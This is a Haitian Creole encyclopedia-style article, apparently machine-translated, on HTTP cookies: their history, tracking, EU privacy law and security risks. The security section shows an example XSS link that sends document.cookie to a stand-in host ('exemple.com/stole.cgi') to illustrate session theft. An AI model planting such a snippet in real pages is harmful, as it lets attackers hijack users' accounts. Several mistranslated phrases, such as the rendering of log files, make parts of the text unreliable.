Bonbon Entènèt: Ki sa li ye? Definisyon, Orijin, Kalite ak Konfidansyalite

Un bonbon oswa bonbon entènèt (Oswa bonbon, abreje kòm temwen nan Quebec) se defini nan pwotokòl kominikasyon HTTP kòm se yon sekans enfòmasyon voye pa yon sèvè HTTP a yon kliyan HTTP, ki lèt la retounen chak fwa yo mande menm sèvè HTTP nan sèten kondisyon.

Bonbon an se ekivalan a ti fichye tèks ki estoke sou tèminal la nan itilizatè entènèt la. Ki egziste pou plis pase 20 ane, yo pèmèt devlopè sit entènèt yo estoke done itilizatè yo nan lòd yo fasilite navigasyon yo ak pèmèt sèten fonksyonalite. Bonbon yo te toujou plis oswa mwens kontwovèsyal paske yo gen enfòmasyon pèsonèl rezidyèl ki ka potansyèlman eksplwate pa twazyèm pati.

Li voye kòm yon header HTTP pa sèvè entènèt la nan navigatè entènèt la ki retounen li san okenn chanjman chak fwa li jwenn aksè nan sèvè a. Yon bonbon ka sèvi pou yon otantifikasyon, yon sesyon (antretyen leta), ak pou magazen enfòmasyon espesifik sou itilizatè a, tankou preferans sit oswa sa ki nan yon charyo elektwonik. Tèm bonbon an sòti nan bonbon majik, yon konsèp byen li te ye nan UNIX informatique, ki te enspire lide a ak non nan bonbon navigatè. Gen kèk altènativ pou bonbon, yo chak ak pwòp itilizasyon, avantaj ak dezavantaj yo.

Lè yo te senp dosye tèks, bonbon yo pa ègzèkutabl. Yo pa ni espyon ni viris, byenke anpil lojisyèl anti-viris detekte bonbon ki soti nan kèk sit paske yo pèmèt itilizatè yo swiv lè yo vizite plizyè sit. 

Pifò navigatè modèn pèmèt itilizatè yo deside si yo aksepte oswa rejte bonbon. Itilizatè yo kapab tou chwazi konbyen tan bonbon yo estoke. Sepandan, rejè konplè bonki fè kèk sit pa ka itilize. Pou egzanp, magazen kabwa oswa sit ki mande pou konekte ak kalifikasyon (non itilizatè ak modpas).

istorik

Tèm nan bonbon soti nan tèm angle a bonbon majik, ki se yon pake done ke yon pwogram resevwa epi retounen san chanjman. Bonbon yo te deja itilize nan IT lè Lou Montulli te gen lide sèvi ak yo nan kominikasyon entènèt nan mwa jen 1994. Nan tan sa a, li te anplwaye nan Netscape Communications, ki te devlope yon aplikasyon e-commerce pou yon kliyan. Bonbon yo te bay yon solisyon a pwoblèm nan fyab nan aplikasyon vityèl shopping cart yon magazen an.

John Giannandrea ak Lou Montulli te ekri premye espesifikasyon bonbon Netscape nan menm ane sa a. Vèsyon 0.9 beta Mosaic Netscape, ki te pibliye 13 oktòb 1994, entegre teknoloji bonbon (gade pòs la). Premye (ki pa eksperimantal) itilizasyon bonbon se te pou detèmine si vizitè sitwèb Netscape la te vizite sit la anvan. Montulli te depoze yon aplikasyon patant pou teknoloji bonbon an 1995, e yo te akòde patant US 5774670. akòde an 1998.

Apre yo te aplike nan Netscape 0.9 beta an 1994, bonbon yo te entegre nan Internet Explorer 2, ki te pibliye nan mwa Oktòb 1995.

Entwodiksyon nan bonbon poko te lajman konnen piblik la. An patikilye, bonbon yo te aksepte pa default nan paramèt navigatè a, epi itilizatè yo pa te enfòme sou prezans yo. Gen kèk moun ki te okouran de egzistans bonbon alantou premye trimès 1995, men piblik la an jeneral te sèlman pran egzistans yo apre Financial Times te pibliye yon atik nan dat 12 fevriye 1996. Nan menm ane a, bonbon te resevwa anpil atansyon medya. akòz entrizyon posib sou vi prive. Sijè bonbon yo te diskite nan de konsiltasyon nan Komisyon Komès Federal Ameriken an nan 1996 ak 1997.

Devlopman spesifikasyon ofisyèl bonbon an te deja sou pye. Premye diskisyon yo sou spesifikasyon ofisyèl la te fèt nan mwa avril 1995 sou lis adrès www-talk la. Yon gwoup travay espesyal IETF te fòme. Brian Behlendorf ak David Kristol te pwopoze de pwopozisyon altènatif pou entwodwi tranzaksyon eta a HTTP respektivman, men gwoup la, ki te dirije pa Kristol tèt li, te deside sèvi ak spesifikasyon Netscape a kòm yon pwen depa. An fevriye 1996, gwoup travay la te detèmine ke bonbon twazyèm pati yo te yon menas enpòtan pou vi prive. Spesifikasyon ki te pwodwi pa gwoup la te evantyèlman pibliye kòm RFC 2109.

Soti nan fen 2014, nou wè yon banyè sou bonbon sou anpil sit. Gen omwen yon ekstansyon navigatè ki pèmèt banyè pa parèt.

Kalite bonbon ak itilizasyon

Jesyon sesyon

Yo ka itilize bonbon pou kenbe done itilizatè yo pandan navigasyon, men tou atravè plizyè vizit. Yo te entwodui bonbon pou bay yon mwayen pou enplemante charyo elektwonik, yon aparèy vityèl kote itilizatè a ka akimile atik li vle achte pandan y ap navige sou sit la.

Jou sa yo, apps tankou charyo fè makèt olye estoke lis atik yo nan yon baz done sou yon sèvè, ki pi bon; pase sove yo nan bonbon nan tèt li. Sèvè entènèt la voye yon bonbon ki gen yon ID sesyon inik. Lè sa a, navigatè entènèt la retounen ID sesyon sa a sou chak demann ki vin apre yo epi atik yo nan panyen an yo sove ak asosye ak menm ID sesyon inik sa a.

Itilizasyon bonbon souvan itil pou konekte sou yon sit lè l sèvi avèk kalifikasyon. Nan ti bout tan, sèvè wèb la premye voye yon bonbon ki gen yon ID sesyon inik. Lè sa a, itilizatè yo bay kalifikasyon yo (anjeneral yon non itilizatè ak modpas). Lè sa a, aplikasyon entènèt la otantifye sesyon an epi pèmèt itilizatè a jwenn aksè nan sèvis la.

personnalisation

Yo ka itilize bonbon pou sonje enfòmasyon sou itilizatè a nan yon sit, yo nan lòd yo montre li kontni apwopriye nan lavni. Pa egzanp, yon sèvè entènèt ka voye yon bonbon ki gen dènye non itilizatè yo itilize pou konekte sou sitwèb sa a, pou non itilizatè a ka pre-peple sou vizit lavni yo.

Anpil sit entènèt itilize bonbon pou pèsonalizasyon ki baze sou preferans itilizatè yo. Itilizatè yo chwazi preferans yo nan yon fòm epi soumèt sa yo bay sèvè a. Sèvè a kode preferans yo nan yon bonbon epi voye li tounen nan navigatè a. Imedyatman, chak fwa itilizatè a aksè nan yon paj nan sit sa a, navigatè a retounen bonbon an ak Se poutèt sa lis la nan preferans; sèvè a ka Lè sa a, Customize paj la selon preferans itilizatè a. Pa egzanp, sit entènèt Wikipedya a pèmèt itilizatè li yo chwazi po a nan sit la yo pito. Motè rechèch Google la pèmèt itilizatè li yo (menm si yo pa anrejistre) chwazi kantite rezilta yo vle wè sou chak paj rezilta yo.

Tracking

Tracking cookies yo itilize pou swiv abitid Navigasyon itilizatè entènèt yo. Sa a ka fè tou an pati lè w sèvi ak adrès IP òdinatè a ki fè yon demann pou yon paj oswa lè w itilize header HTTP 'referans la' ke kliyan an voye ak chak demann, men bonbon pèmèt pou pi gwo presizyon. Sa a ka fè tankou nan egzanp sa a:

1. Si itilizatè a rele yon paj sou yon sit, epi demann lan pa gen yon bonbon, sèvè a sipoze ke sa a se premye paj itilizatè a vizite. Lè sa a, sèvè a kreye yon fisèl o aza epi voye li nan navigatè a ansanm ak paj yo mande a.
2. Apati moman sa a, navigatè a pral voye bonbon an otomatikman chak fwa yo rele yon nouvo paj sit la. Sèvè a pral voye paj la kòm dabitid, men li pral tou konekte URL la nan paj la rele, dat, lè demann lan ak bonbon an nan yon dosye boutèy demi lit.

Lè w gade dosye log la, li posib pou wè ki paj itilizatè a te vizite ak nan ki lòd. Pa egzanp, si fichye a gen kèk demann ki fèt ak id=abc bonbon, sa ka etabli ke tout demann sa yo soti nan menm itilizatè a. URL yo mande a, dat ak lè ki asosye ak demann yo pèmèt yo swiv navigasyon itilizatè a.

Bonbon twazyèm-pati ak baliz entènèt, eksplike pi ba a, anplis pèmèt swiv atravè sit diferan. Se sèl sit swiv jeneralman itilize pou rezon estatistik. Kontrèman, konpayi piblisite yo itilize swivi atravè sit diferan lè l sèvi avèk bonbon twazyèm pati yo pou yo pwodui pwofil itilizatè anonim (ki answit yo itilize pou detèmine ki piblisite yo ta dwe montre itilizatè a epi voye imèl ba li ki koresponn ak piblisite sa yo - SPAM. ).

Suivi bonbon yo se yon risk pou envazyon nan vi prive itilizatè yo men yo ka fasilman efase. Pifò navigatè modèn yo enkli yon opsyon pou efase otomatikman bonbon ki pèsistan lè yo fèmen aplikasyon an.

Twazyèm pati bonbon

Imaj ak lòt objè ki genyen nan yon paj wèb ka abite sou sèvè diferan de youn ki hosting paj la. Pou montre paj la, navigatè a telechaje tout objè sa yo. Pifò sit entènèt gen enfòmasyon ki soti nan diferan sous. Pa egzanp, si w tape www.example.com nan navigatè w la, souvan pral gen objè oswa piblisite sou yon pati nan paj la ki soti nan diferan sous, sa vle di ki soti nan yon domèn diferan pase www.example.com. Bonki "Premye" pati yo se bonbon ki mete nan domèn ki nan lis nan ba adrès navigatè a. Bonki twazyèm pati yo mete pa youn nan objè yo paj ki soti nan yon domèn diferan.

Pa default, navigatè tankou Mozilla Firefox, Microsoft Internet Explorer ak Opera aksepte bonbon twazyèm pati, men itilizatè yo ka chanje paramèt yo nan opsyon navigatè a pou bloke yo. Pa gen okenn risk sekirite nannan nan cookies twazyèm pati ki pèmèt fonksyonalite entènèt, sepandan yo tou yo itilize yo swiv itilizatè yo. soti nan sit an sit.

Zouti tankou Ghostery ki disponib pou tout navigatè ki gen ladan Google Chrome ka bloke echanj ant twazyèm pati.

Aplikasyon

Bonbon yo se ti moso done sèvè entènèt la voye bay navigatè a. Navigatè a retounen yo san okenn chanjman nan sèvè a, entwodwi eta (memwa nan evènman sot pase yo) nan tranzaksyon an HTTP otreman apatrid. San cookies, chak rekipere yon paj wèb oswa yon eleman nan yon paj wèb se yon evènman izole, endepandan de lòt demann yo fè sou sit la. Anplis de sa ke yo kapab mete pa sèvè entènèt la, bonbon yo ka mete tou pa lang script tankou JavaScript, si navigatè a sipòte ak otorize.

Espesifikasyon bonbon ofisyèl la sijere ke navigatè yo ta dwe kapab sove epi voye yon kantite minimòm bonbon. Espesyalman, yon navigatè ta dwe kapab estoke omwen 300 bonbon nan kat kilookte chak, ak omwen 20 bonbon pou yon sèl sèvè oswa domèn.

Dapre seksyon 3.1 nan RFC 2965, non bonbon yo pa sansib pou majiskil.

Yon bonbon ka presize dat ekspirasyon li, nan ka sa a bonbon an pral efase nan dat sa a. Si bonbon an pa presize yon dat ekspirasyon, bonbon an efase le pli vit ke itilizatè a kite navigatè li a. Se poutèt sa, espesifye yon dat ekspirasyon se yon fason pou fè bonbon an siviv nan plizyè sesyon. Pou rezon sa a, yo di bonbon ki gen yon dat ekspirasyon ki pèsistan. Yon egzanp aplikasyon: yon sit an detay ta ka itilize bonbon ki pèsistan pou anrejistre atik ke itilizatè yo te mete nan panier yo (an reyalite, bonbon an ta ka refere a yon antre ki te sove nan yon baz done sou sit vant lan, epi li pa nan òdinatè w lan) . Atravè sa vle di, si itilizatè yo kite navigatè yo san yo pa fè yon achte epi retounen nan li pita, yo pral kapab jwenn atik yo nan kabwa a ankò. Si bonbon sa yo pa t bay yon dat ekspirasyon, yo ta ekspire lè navigatè a te fèmen, epi enfòmasyon sou sa ki nan panyen an ta pèdi.

Bonbon yo ka limite nan sijè ki abòde lan nan yon domèn espesifik, sou-domèn oswa chemen sou sèvè a ki te kreye yo.

Kreyasyon yon bonbon

Transfè a nan paj wèb fè lè l sèvi avèk HyperText Transfer Protocol (HTTP). Lè yo inyore bonbon, navigatè yo rele yon paj ki soti nan serveurs entènèt lè yo jeneralman voye yo yon tèks kout rele HTTP demann. Pa egzanp, pou jwenn aksè nan paj www.example.org/index.html, navigatè yo konekte ak sèvè www.example.org epi voye yon demann ki sanble sa a:

	GET /index.html HTTP/1.1Host: www.example.org
navigatè	→	Server

Sèvè a reponn pa voye paj la mande a, anvan pa yon tèks menm jan an, yo te rele tout la Repons HTTP. Pake sa a ka gen liy ki enstwi navigatè a pou konsève bonbon:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=valè (paj HTML)
navigatè	←	Server

Sèvè a sèlman voye liy lan Set-Cookie, si sèvè a vle navigatè a sere yon bonbon. Set-Cookie se yon demann pou navigatè a estoke non = chèn valè a epi retounen li nan tout demann nan lavni nan sèvè a. Si navigatè a sipòte bonbon ak bonbon yo aktive nan opsyon navigatè a, bonbon an pral enkli nan tout demann ki vin apre yo te fè nan menm sèvè a. Pa egzanp, navigatè a rele paj www.example.org/news.html lè li voye demann sa a sou sèvè www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
navigatè	→	Server

Sa a se yon demann pou yon lòt paj ki soti nan menm sèvè a, epi li diferan de premye a pi wo a paske li gen yon fisèl ke sèvè a te deja voye nan navigatè a. Mèsi a sa a vle di, sèvè a konnen ke demann sa a se lye ak yon sèl anvan an. Sèvè a reponn lè li voye paj ki rele a, epi tou li ajoute lòt bonbon nan li.

Valè bonbon an ka chanje pa sèvè a lè w voye yon nouvo liy Set-Cookie: name=new_value an repons a paj la rele. Lè sa a, navigatè a ranplase ansyen valè a ak yon nouvo.

Liy Set-Cookie a anjeneral kreye pa yon pwogram CGI oswa lòt lang scripting, pa pa sèvè HTTP a. Sèvè HTTP a (egzanp: Apache) pral sèlman transmèt rezilta pwogram nan (yon dokiman anvan pa header ki gen bonbon yo) nan navigatè a.

JavaScript oswa lòt lang ki sanble yo ka mete bonbon tou nan navigatè a, sa vle di sou bò kliyan olye de bò sèvè. Nan JavaScript, yo itilize objè document.cookie pou objektif sa a. Pa egzanp, deklarasyon document.cookie = "temperature=20" kreye yon bonbon ki rele "tanperati" ak yon valè 20.

Atribi yon bonbon

Anplis pè non/valè, yon bonbon kapab genyen tou yon dat ekspirasyon, yon chemen, yon non domèn ak kalite koneksyon ki gen entansyon, sa vle di nòmal oswa chiffres. RFC 2965 defini tou ke bonbon yo dwe gen yon nimewo vèsyon obligatwa, men sa a se jeneralman omisyon. Pati done sa yo swiv pè name=new_value epi yo separe pa pwen virgul. Pa egzanp, sèvè a ka kreye yon bonbon lè w voye yon liy Set-Cookie: name=new_value; ekspire = dat; chemen =/; domèn=.egzanp.org.

Ekspire yon bonbon

Bonbon ekspire epi navigatè a pa voye l sou sèvè a nan sitiyasyon sa yo:

• Lè navigatè a fèmen, si bonbon an pa pèsistan.
• Lè dat ekspirasyon bonbon an pase.
• Lè dat ekspirasyon bonbon an chanje (pa sèvè a oswa script la) nan yon dat nan tan lontan an.
• Lè navigatè a efase bonbon nan demann itilizatè a.

Twazyèm sitiyasyon an pèmèt sèvè oswa script efase yon bonbon klèman. Remake byen ke li posib ak navigatè entènèt Google Chrome pou konnen dat ekspirasyon yon bonbon patikilye lè w gen aksè nan paramèt kontni yo. Yon bonbon ki sove sou yon òdinatè ka trè byen rete la pandan plizyè deseni si pa pran okenn pwosedi pou efase li.

Estereyotip

Depi entwodiksyon yo sou entènèt la, anpil lide sou bonbon yo te sikile sou entènèt la ak nan medya yo. An 1998, CIAC, yon ekip siveyans ensidan òdinatè Depatman Enèji Etazini, te detèmine ke frajilite sekirite bonbon yo te "esansyèlman inexistant" epi li te eksplike ke "enfòmasyon sou orijin vizit ou yo ak detay sou paj wèb ou te vizite yo. deja egziste nan dosye yo boutèy demi lit nan sèvè entènèt yo". An 2005, Jupiter Research te pibliye rezilta yon etid, kote yon pousantaj enpòtan nan moun ki repond yo te konsidere deklarasyon sa yo:

• Bonbon yo tankou viris, yo enfekte disk itilizatè yo.
• Bonbon jenere Pop-up.
• Yo itilize bonbon pou voye Spam.
• Yo itilize bonbon sèlman pou fè piblisite.

Cookie yo pa ka efase oswa li enfòmasyon ki soti nan òdinatè itilizatè a. Sepandan, bonbon fè li posib pou detekte paj wèb yon itilizatè vizite sou yon sit oswa yon seri sit. Enfòmasyon sa a ka kolekte nan yon pwofil itilizatè ki ka itilize oswa revann bay twazyèm pati, ki ka poze pwoblèm vi prive grav. Gen kèk pwofil yo anonim, nan sans ke yo pa gen okenn enfòmasyon pèsonèl, men menm pwofil sa yo ka dout.

Dapre etid la menm, yon gwo pousantaj itilizatè entènèt pa konnen ki jan yo efase bonbon. Youn nan rezon ki fè moun pa fè bonbon konfyans se ke kèk sit te abize aspè ki idantifye pèsonèlman nan bonbon epi pataje enfòmasyon sa a ak lòt sous. Yon gwo pousantaj nan piblisite vize ak imèl ki pa mande, ki konsidere kòm Spam, soti nan enfòmasyon ki ranmase nan swiv bonbon.

Anviwònman navigatè a

Pifò navigatè sipòte bonbon epi pèmèt itilizatè a enfim yo. Opsyon ki pi komen yo se:

• Aktive oswa enfim bonbon nèt, pou yo toujou aksepte oswa bloke yo.
• Pèmèt itilizatè a wè bonbon aktif yo nan yon paj, lè w antre javascript: alert(document.cookie) nan ba adrès navigatè a. Gen kèk navigatè ki enkòpore yon manadjè bonbon pou itilizatè a ki ka wè ak selektivman efase bonbon kounye a ki estoke pa navigatè a.

Pifò navigatè pèmèt tou efase konplè done pèsonèl ki gen ladann bonbon. Modil adisyonèl pou kontwole otorizasyon bonbon egziste tou.

Konfidansyalite ak bonbon twazyèm pati

Nan egzanp sa a fiktiv, yon konpayi piblisite te mete bandwòl sou de sit entènèt. Lè yo òganize bandwòl yo sou sèvè li yo ak lè l sèvi avèk bonbon twazyèm pati, konpayi piblisite a kapab swiv navigasyon itilizatè a atravè de sit sa yo.

Bonbon yo gen enplikasyon enpòtan sou vi prive ak anonim itilizatè entènèt yo. Malgre ke bonbon yo sèlman voye tounen nan sèvè ki mete yo oswa nan yon sèvè ki fè pati menm domèn Entènèt la, yon paj entènèt ka sepandan genyen imaj oswa lòt eleman ki estoke sou sèvè ki fè pati lòt domèn. Yo rele bonbon yo ke yo mete pandan rekiperasyon an nan eleman ekstèn sa yo bonbon twazyèm pati. Sa a gen ladan bonbon ki soti nan fenèt pop-up vle.

Konpayi piblisite yo itilize cookies twazyèm pati pou swiv itilizatè yo atravè diferan sit yo vizite yo. An patikilye, yon konpayi piblisite ka swiv yon itilizatè atravè tout paj kote li te mete imaj piblisite oswa yon pixel swiv. Konesans nan paj yo vizite pa itilizatè a pèmèt konpayi an piblisite yo vize preferans yo piblisite nan itilizatè a.

Gen kèk konsidere kapasite pou konstwi yon pwofil itilizatè kòm yon envazyon sou vi prive, espesyalman lè yo fè swivi atravè diferan domèn lè l sèvi avèk bonbon twazyèm pati. Pou rezon sa a, kèk peyi gen lejislasyon sou bonbon.

Gouvènman Etazini te aplike règ strik sou plasman bonbon an 2000, apre li te revele ke Biwo Règleman Medikaman Mezon Blanch lan t ap itilize bonbon pou swiv òdinatè itilizatè yo ki t ap gade piblisite dwòg sou entènèt. An 2002, aktivis sou vi prive Daniel Brandt te dekouvri ke CIA te kite bonbon ki pèsistan sou òdinatè ki te vizite sit entènèt li yo. Yon fwa yo te enfòme sou vyolasyon sa a, CIA te deklare ke bonbon sa yo pa te voye entansyonèlman e li sispann mete yo. Nan dat 25 desanm 2005, Brandt te dekouvri ke Ajans Sekirite Nasyonal (NSA) te kite de bonbon ki pèsistan sou òdinatè vizitè yo akòz yon aktyalizasyon lojisyèl. Apre yo te avèti, NSA a imedyatman enfim bonbon.

Nan Wayòm Ini a, la Lwa bonbon ", ki te antre nan fòs 25 me 2012, oblije sit yo deklare entansyon yo, kidonk pèmèt itilizatè yo chwazi si yo vle kite tras oswa ou pa nan pasaj yo sou entènèt. Yo ka konsa pwoteje kont vize piblisite. Sepandan, dapre Gadyen legal la, konsantman itilizatè Entènèt la pa nesesèman klè; chanjman yo te fè nan kondisyon ki nan konsantman itilizatè, fè li konsa implicite.

Direktiv 2002/58 sou vi prive

Direktiv 202/58 sou enfòmasyon prive ak kominikasyon elektwonik, gen règ sou itilizasyon bonbon. An patikilye, atik 5, paragraf 3 nan direktiv sa a egzije pou estoke done (tankou bonbon) nan òdinatè itilizatè a kapab fèt sèlman si:

• itilizatè a enfòme sou fason yo itilize done yo;
• itilizatè a bay opsyon pou refize operasyon depo sa a. Sepandan, atik sa a tou deklare ke depo done pou rezon teknik yo egzante de lwa sa a.

Akòz yo te aplike soti nan mwa Oktòb 2003, direktiv la te sepandan sèlman trè enpafè mete an pratik dapre yon rapò nan Desanm 2004, ki tou fè remake ke sèten Eta Manm (Slovaki, Letoni, Lagrès, Bèljik ak Liksanbou) pa t 'ankò transpoze a. direktiv nan lwa domestik.

Dapre opinyon G29 la nan 2010, direktiv sa a, ki miyò kondisyone itilizasyon bonbon pou rezon piblisite konpòtman, sou konsantman eksplisit itilizatè entènèt la rete trè mal aplike. An reyalite, pifò sit fè sa nan yon fason ki pa konfòme yo ak direktiv la, lè yo limite tèt yo a yon senp "banyè" enfòme sou itilizasyon "cookies" san yo pa bay enfòmasyon sou itilizasyon yo, san yo pa fè diferans ant bonbon "teknik". "swiv" bonbon, ni yo ofri yon chwa reyèl itilizatè a ki vle kenbe bonbon teknik (tankou bonbon jesyon charyo) epi refize bonbon "swiv". An reyalite, anpil sit pa fonksyone kòrèkteman si yo refize bonbon, ki pa konfòme ak direktiv 2002/58 oswa direktiv 95/46 (Pwoteksyon done pèsonèl).

Directive 2009 / 136 / CE

Materyèl sa a te mete ajou pa Direktiv 2009/136/EC ki te dat 25 novanm 2009 ki di ke "stoke enfòmasyon, oswa jwenn aksè a enfòmasyon ki deja estoke, nan ekipman tèminal yon abònen oswa itilizatè yo pèmèt sèlman a kondisyon ke abònen oswa itilizatè te bay konsantman li, apre li te resevwa, an konfòmite ak Direktiv 95/46/EC, enfòmasyon klè ak konplè, ant lòt moun sou objektif yo nan pwosesis la ". Se poutèt sa, nouvo direktiv la ranfòse obligasyon yo anvan yo mete bonbon sou òdinatè itilizatè entènèt la.

Nan konsiderasyon preliminè nan direktiv la, lejislatè Ewopeyen an presize sepandan: "Kote teknikman posib ak efikas, an akò ak dispozisyon ki enpòtan nan Directive 95/46/EC, konsantman an nan itilizatè a konsènan pwosesis la ka eksprime nan itilizasyon paramèt apwopriye yon navigatè oswa yon lòt aplikasyon”. Men, an reyalite, pa gen okenn navigatè jodi a ki fè li posib yo separe bonbon teknik esansyèl yo ak sa yo si ou vle ki ta dwe kite nan chwa itilizatè a.

Nouvo direktiv sa a te transpoze pa Deputy Bèlj yo an Jiyè 2012. Yon etid 2014 montre ke menm Deputy yo ap lite pou aplike. kontrent yo nan direktiv la.

P3P

Espesifikasyon P3P a gen ladan kapasite pou yon sèvè bay yon règleman sou enfòmasyon prive, ki defini ki kalite enfòmasyon li kolekte ak pou ki rezon. Règleman sa yo enkli (men pa limite a) itilizasyon enfòmasyon yo kolekte lè l sèvi avèk cookies. Dapre definisyon P3P yo, yon navigatè ka aksepte oswa rejte bonbon lè li konpare règleman sou enfòmasyon prive yo ak preferans itilizatè a oswa lè li mande itilizatè a, li prezante deklarasyon sou vi prive sèvè a te deklare.

Anpil navigatè, ki gen ladan Apple Safari ak Microsoft Internet Explorer vèsyon 6 ak 7, sipòte P3P ki pèmèt navigatè a detèmine si yo aksepte depo bonbon twazyèm pati. Navigatè Opera a pèmèt itilizatè yo refize bonki twazyèm pati ak kreye yon pwofil sekirite mondyal ak espesifik pou domèn Entènèt. Mozilla Firefox vèsyon 2 lage sipò P3P men retabli li nan vèsyon 3.

Pifò navigatè yo ka bloke bonbon twazyèm-pati pou ogmante vi prive epi redwi swivi anons, san yo pa afekte eksperyans entènèt itilizatè a yon fason negatif. Anpil ajans piblisite ofri yon opsyon patisipe nan piblisite vize, lè w mete yon bonbon jenerik nan navigatè a ki dezaktive vize sa a, men solisyon sa a pa pratikman efikas, lè yo respekte l, paske bonbon jenerik sa a efase le pli vit ke itilizatè a efase bonbon sa yo ki anile opt la. soti desizyon.

Dezavantaj nan bonbon

Anplis pwoblèm vi prive, bonbon yo gen kèk dezavantaj teknik tou. An patikilye, yo pa toujou byen idantifye itilizatè yo, yo ka ralanti pèfòmans sit lè yo nan gwo kantite, yo ka itilize pou atak sekirite, epi yo konfli ak transfè a reprezantan eta, style achitekti nan lojisyèl an.

Idantifikasyon ensèk

Si yo itilize plis pase yon navigatè sou yon òdinatè, nan chak nan yo toujou gen yon inite depo separe pou bonbon. Se poutèt sa bonbon yo pa idantifye yon moun, men konbinezon an nan yon kont itilizatè, yon òdinatè, ak yon navigatè entènèt. Kidonk, nenpòt moun ka itilize kont sa yo, òdinatè, oswa navigatè ki gen panopli de bonbon. Menm jan an tou, bonbon pa fè diferans ant plizyè itilizatè ki pataje menm kont itilizatè a, òdinatè, ak navigatè a, tankou nan "kafe entènèt" oswa nenpòt kote ki bay aksè gratis nan resous òdinatè.

Men, nan pratik, deklarasyon sa a vire soti nan fo nan majorite ka yo paske jodi a yon òdinatè "pèsonèl" (oswa yon smartphone, oswa yon tablèt, ki se pi mal) se sitou itilize pa yon sèl moun. atravè volim enfòmasyon yo kolekte rive nan vize pèsonalize menm si moun nan pa "savwa" idantifye.

Vòl bonbon

Yon lòt òdinatè ka vòlè yon bonbon sou rezo a.

Pandan operasyon nòmal, bonbon yo voye tounen ant sèvè a (oswa yon gwoup sèvè nan menm domèn) ak navigatè òdinatè itilizatè a. Depi bonbon yo ka gen enfòmasyon sansib (non itilizatè, yon modpas yo itilize pou otantifikasyon, elatriye), valè yo pa ta dwe aksesib a lòt òdinatè. Vòl bonbon se yon zak entèsepsyon bonbon pa yon twazyèm pati san otorizasyon.

Yo ka vòlè bonbon atravè yon sniffer pake nan yon atak ki rele vòl sesyon. Sikilasyon sou rezo a ka entèsepte epi li pa òdinatè lòt pase moun k ap voye ak k ap resevwa (espesyalman sou espas piblik Wi-Fi ki pa chiffres). Trafik sa a gen ladann bonbon ki voye sou sesyon yo lè l sèvi avèk pwotokòl HTTP plenn lan. Lè trafik rezo a pa chiffres, itilizatè move ka konsa li kominikasyon lòt itilizatè yo sou rezo a lè l sèvi avèk "packet sniffers".

Pwoblèm sa a ka simonte pa chifre koneksyon ki genyen ant òdinatè itilizatè a ak sèvè a lè l sèvi avèk pwotokòl la HTTPS. Yon sèvè ka presize yon drapo an sekirite pandan y ap mete yon bonbon; navigatè a pral voye li sèlman sou yon liy ki an sekirite, tankou yon koneksyon SSL.

Sepandan anpil sit, byenke itilize HTTPS kominikasyon ankripte pou otantifikasyon itilizatè (sa vle di paj la konekte), pita voye bonbon sesyon ak lòt done kòm nòmal, atravè koneksyon HTTP ki pa chiffres pou rezon efikasite. Atakè yo ka entèsepte bonbon lòt itilizatè yo epi imite yo sou sit ki apwopriye oswa itilize yo nan atak bonbon.

Scripting nan sit la: yon bonbon ki ta dwe sèlman echanje ant sèvè a ak kliyan an voye bay yon lòt twazyèm pati.

Yon lòt fason yo vòlè bonbon se nan sit script epi fè navigatè a li menm voye bonbon nan serveurs move ki pa janm resevwa yo. Navigatè modèn yo pèmèt ekzekisyon pati recherché nan kòd soti nan sèvè a. Si yo jwenn aksè nan bonbon pandan ègzekutabl, valè yo ka kominike sou kèk fòm nan sèvè ki pa ta dwe jwenn aksè nan yo. Kripte bonbon anvan yo voye yo sou rezo a pa ede anpeche atak la.

Tipikman atakè yo itilize kalite scripting sou sit sa a sou sit ki pèmèt itilizatè yo poste kontni HTML. Lè w entegre yon pati nan kòd konpatib nan kontribisyon HTML, yon atakè ka resevwa bonbon nan men lòt itilizatè. Konesans nan bonbon sa yo ka itilize lè w konekte nan menm sit la lè l sèvi avèk bonbon yo vòlè, kidonk yo te rekonèt kòm itilizatè a ki gen bonbon yo te vòlè.

Youn nan fason yo anpeche atak sa yo se sèvi ak drapo a HttpOnly; li se yon opsyon, prezante depi vèsyon 6 nan Internet Explorer nan PHP depi vèsyon 5.2.0 ki te planifye fè bonbon an inaksesib a kliyan an tou pre script la. Sepandan, devlopè entènèt yo ta dwe pran sa an kont nan devlopman sit yo pou yo iminize kont scripting nan sit la.

Yon lòt menas sekirite itilize se fabwikasyon demann nan sit la.

Espesifikasyon teknik ofisyèl la pèmèt bonbon yo dwe voye tounen sèlman nan serveurs nan domèn kote yo soti. Sepandan, valè bonbon yo ka voye bay lòt sèvè lè l sèvi avèk lòt mwayen pase tèt bonbon.

An patikilye, lang scripting tankou JavaScript yo jeneralman gen dwa jwenn aksè nan valè bonbon epi yo kapab voye valè abitrè nan nenpòt sèvè sou entènèt la. Kapasite script sa a itilize nan sit entènèt ki pèmèt itilizatè yo poste kontni HTML pou lòt itilizatè yo wè.

Pou egzanp, yon atakè k ap opere sou domèn example.com a ta ka poste yon kòmantè ki gen lyen sa a ki montre yon blog popilè ke yo pa kontwole:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Lè yon lòt itilizatè klike sou lyen sa a, navigatè a egzekite yon pati atribi onclick nan kòd la, kidonk li ranplase fisèl document.cookie la ak lis bonbon itilizatè ki aktif pou paj sa a. Se poutèt sa, lis sa a nan bonbon yo voye nan sèvè a example.com, ak atakè a se poutèt sa kapab kolekte bonbon yo nan itilizatè sa a.

Kalite atak sa a difisil pou detekte sou bò itilizatè a paske script la soti nan menm domèn ki mete bonbon an, epi operasyon an voye valè yo parèt otorize pa domèn sa a. Yo konsidere ke se responsablite administratè ki opere kalite sit sa a pou mete an plas restriksyon ki anpeche piblikasyon kòd move.

Bonbon yo pa vizib dirèkteman nan pwogram bò kliyan tankou JavaScript si yo te voye ak drapo a HttpOnly. Soti nan pwen de vi sèvè a, diferans lan sèlman se ke nan liy lan nan header la Set-Cookie te ajoute yon nouvo jaden ki gen fisèl la HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Lè navigatè a resevwa yon bonbon konsa, li sipoze sèvi ak li nòmalman nan echanj HTTP sa a, men san yo pa fè li vizib nan scripts ki fèt sou bò kliyan an. Drapo HttpOnly a pa fè pati okenn spesifikasyon teknik ofisyèl, epi li pa aplike nan tout navigatè yo. Remake byen ke kounye a pa gen okenn fason yo anpeche lekti ak ekri nan bonbon sesyon pa metòd la XMLHTTPRequest.

